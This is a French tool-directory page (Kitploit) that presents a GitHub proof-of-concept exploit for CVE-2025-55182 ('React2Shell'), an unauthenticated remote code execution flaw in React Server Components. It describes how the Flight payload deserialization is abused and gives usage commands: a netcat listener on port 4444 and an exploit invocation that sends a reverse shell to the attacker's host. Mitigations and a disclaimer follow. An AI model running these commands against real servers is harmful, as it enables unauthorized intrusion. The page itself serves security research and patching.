Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-React2Shell-RCE — Preuve de concept d'exploit pour CVE-2025-55182 (React2Shell), une vulnérabilité d'exécution de code à distance non authentifiée dans les composants serveur React via des charges utiles de protocole Flight conçues. | Kitploit
Outils/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Preuve de concept d'exploit pour CVE-2025-55182 (React2Shell), une vulnérabilité d'exécution de code à distance non authentifiée dans les composants serveur React via des charges utiles de protocole Flight conçues.

Voir le dépôt
13il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (RCE non authentifié dans les composants serveur React)

CVE-2025-55182, également connue sous le nom de React2Shell, est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifié affectant les packages React Server Components (versions 19.0, 19.1.0, 19.1.1 et 19.2.0).

Cette vulnérabilité peut permettre à des attaquants d'exécuter du code arbitraire sur les serveurs vulnérables via une seule requête HTTP spécialement conçue, sans nécessiter d'authentification.


Aperçu

React Server Components utilisent le protocole Flight pour sérialiser et désérialiser les données des composants échangées entre le client et le serveur.

Une validation insuffisante lors de ce processus de désérialisation peut permettre à des charges utiles spécialement conçues de manipuler les structures d'objets internes et d'atteindre des primitives d'exécution JavaScript dangereuses.


Cause racine

La vulnérabilité provient d'une validation insuffisante lors de la désérialisation des charges utiles du protocole Flight de React Server Components (RSC).

Des charges utiles spécialement conçues peuvent :

  • manipuler les structures d'objets internes
  • parcourir la chaîne de prototypes JavaScript
  • accéder à des constructeurs JavaScript dangereux
  • exécuter du code arbitraire sur le serveur

Fonctionnement

  1. L'exploit envoie une requête multipart/form-data spécialement conçue
  2. Le serveur interprète la requête comme une charge utile React Flight
  3. Le fragment malveillant est traité lors de la désérialisation
  4. La charge utile :
  • manipule le flux d'exécution interne
  • atteint des primitives d'exécution JavaScript dangereuses
  • exécute du code arbitraire
  1. L'attaquant obtient une exécution de code à distance sur le serveur cible

🚀 Utilisation

Lancez un écouteur sur votre machine :

root@kitploit:~
nc -lvnp 4444

Exécutez l'exploit :

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Prérequis

  • Versions vulnérables de React / Next.js
  • Composants serveur React activés côté serveur
  • Point de terminaison RSC accessible

Atténuation

Pour atténuer cette vulnérabilité :

  • Mettez à jour React vers la dernière version corrigée disponible
  • Appliquez les correctifs de framework disponibles
  • Surveillez et bloquez les requêtes RSC suspectes

Références

  • OffSec – Analyse de l'exploitation de CVE-2025-55182

  • Microsoft Security – Défense contre React2Shell

  • Avis de sécurité React (Divulgation officielle)


Avertissement

Ce projet est fourni strictement pour :

  • La recherche en sécurité
  • Des fins éducatives
  • Des évaluations de sécurité et tests de pénétration autorisés

Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce matériel. Les utilisateurs sont seuls responsables du respect de toutes les lois et réglementations applicables.

Télécharger l’outil